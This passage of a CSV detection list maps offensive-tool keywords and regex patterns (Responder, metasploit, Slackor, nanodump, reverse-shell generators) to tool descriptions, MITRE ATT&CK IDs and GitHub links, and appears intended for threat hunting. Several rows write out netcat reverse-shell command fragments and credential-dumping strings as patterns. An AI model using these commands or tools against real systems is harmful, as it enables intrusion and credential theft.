APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*replace_video_fake_plugin*",".{0,1000}replace_video_fake_plugin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Replacing /etc/dhcp/dhcpd.conf with no route push config*",".{0,1000}Replacing\s\/etc\/dhcp\/dhcpd\.conf\swith\sno\sroute\spush\sconfig.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*RePRGM/Nimperiments*",".{0,1000}RePRGM\/Nimperiments.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*RequestAsPython-PowerShell.py*",".{0,1000}RequestAsPython\-PowerShell\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. 
and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Requesting meterpreter payload from https://*",".{0,1000}Requesting\smeterpreter\spayload\sfrom\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Requesting S4U2Proxy*",".{0,1000}Requesting\sS4U2Proxy.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Requesting S4U2self*",".{0,1000}Requesting\sS4U2self.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*require 'evil-proxy'*",".{0,1000}require\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require 'evil-proxy/async'*",".{0,1000}require\s\'evil\-proxy\/async\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require 'evil-proxy/store'*",".{0,1000}require\s\'evil\-proxy\/store\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require('child_process').exec('nc -e ""/bin/bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""/bin/sh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/sh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""cmd"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""cmd\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""powershell"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""powershell\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""pwsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""pwsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""zsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""zsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e sh *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - 
T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*reshacker_setup.exe*",".{0,1000}reshacker_setup\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*ResourceDevelopment_EstablishAccounts_RGPerson.py*",".{0,1000}ResourceDevelopment_EstablishAccounts_RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*ResourceDevelopment_Server_DNSLog.py*",".{0,1000}ResourceDevelopment_Server_DNSLog\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*ResourceDevelopment_Server_LDAPServer.py*",".{0,1000}ResourceDevelopment_Server_LDAPServer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*ResourceDevelopment_WebServices_TencentAPIGateway.py*",".{0,1000}ResourceDevelopment_WebServices_TencentAPIGateway\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Resources/Design/NinjaStyle.ps1*",".{0,1000}Resources\/Design\/NinjaStyle\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" 
"*Resources/drone.dll*",".{0,1000}Resources\/drone\.dll.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Resources\donut.exe*",".{0,1000}Resources\\donut\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*responder * --lm*",".{0,1000}responder\s.{0,1000}\s\-\-lm.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder -i *",".{0,1000}responder\s\-i\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder --interface*",".{0,1000}responder\s\-\-interface.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder.py -I *",".{0,1000}Responder\.py\s\-I\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*Responder.py*",".{0,1000}Responder\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Responder/tools/MultiRelay/bin/Runas.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Runas\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder/tools/MultiRelay/bin/Syssvc.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Syssvc\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-http-off*",".{0,1000}responder\-http\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-http-on*",".{0,1000}responder\-http\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 
- TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder-Session.log*",".{0,1000}Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder-smb-off*",".{0,1000}responder\-smb\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-smb-on*",".{0,1000}responder\-smb\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder-Windows*",".{0,1000}Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*restic2john.py*",".{0,1000}restic2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*restore_signature.sh *.dmp*",".{0,1000}restore_signature\.sh\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*RestrictedAdmin.exe*",".{0,1000}RestrictedAdmin\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*Results are on disk, enumerating next DC!*",".{0,1000}Results\sare\son\sdisk,\senumerating\snext\sDC!.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*resuming a previous NTDS.DIT dump session *",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Retrieve Domain Cached Credentials hashes from registry*",".{0,1000}Retrieve\sDomain\sCached\sCredentials\shashes\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Retrieve LSA secrets stored in registry*",".{0,1000}Retrieve\sLSA\ssecrets\sstored\sin\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Retrieve Wdigest credentials from registry*",".{0,1000}Retrieve\sWdigest\scredentials\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*return-wizard-rce-exim.txt*",".{0,1000}return\-wizard\-rce\-exim\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*rev_kali_192_168_0_110_1234*",".{0,1000}rev_kali_192_168_0_110_1234.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*reveng007/C2_Server*",".{0,1000}reveng007\/C2_Server.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*reveng007/DarkWidow*",".{0,1000}reveng007\/DarkWidow.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*reveng007/Executable_Files*",".{0,1000}reveng007\/Executable_Files.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*reveng007/ReflectiveNtdll*",".{0,1000}reveng007\/ReflectiveNtdll.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - 
T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*reveng007/SharpGmailC2*",".{0,1000}reveng007\/SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*RevengeRAT-Stub-CSsharp*",".{0,1000}RevengeRAT\-Stub\-CSsharp.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","1","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*reverse_shell_https.ps1*",".{0,1000}reverse_shell_https\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*reverse_shell_minified.js*",".{0,1000}reverse_shell_minified\.js.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*reverse_tcp_x64.rb*",".{0,1000}reverse_tcp_x64\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reverse_win_http.rb*",".{0,1000}reverse_win_http\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
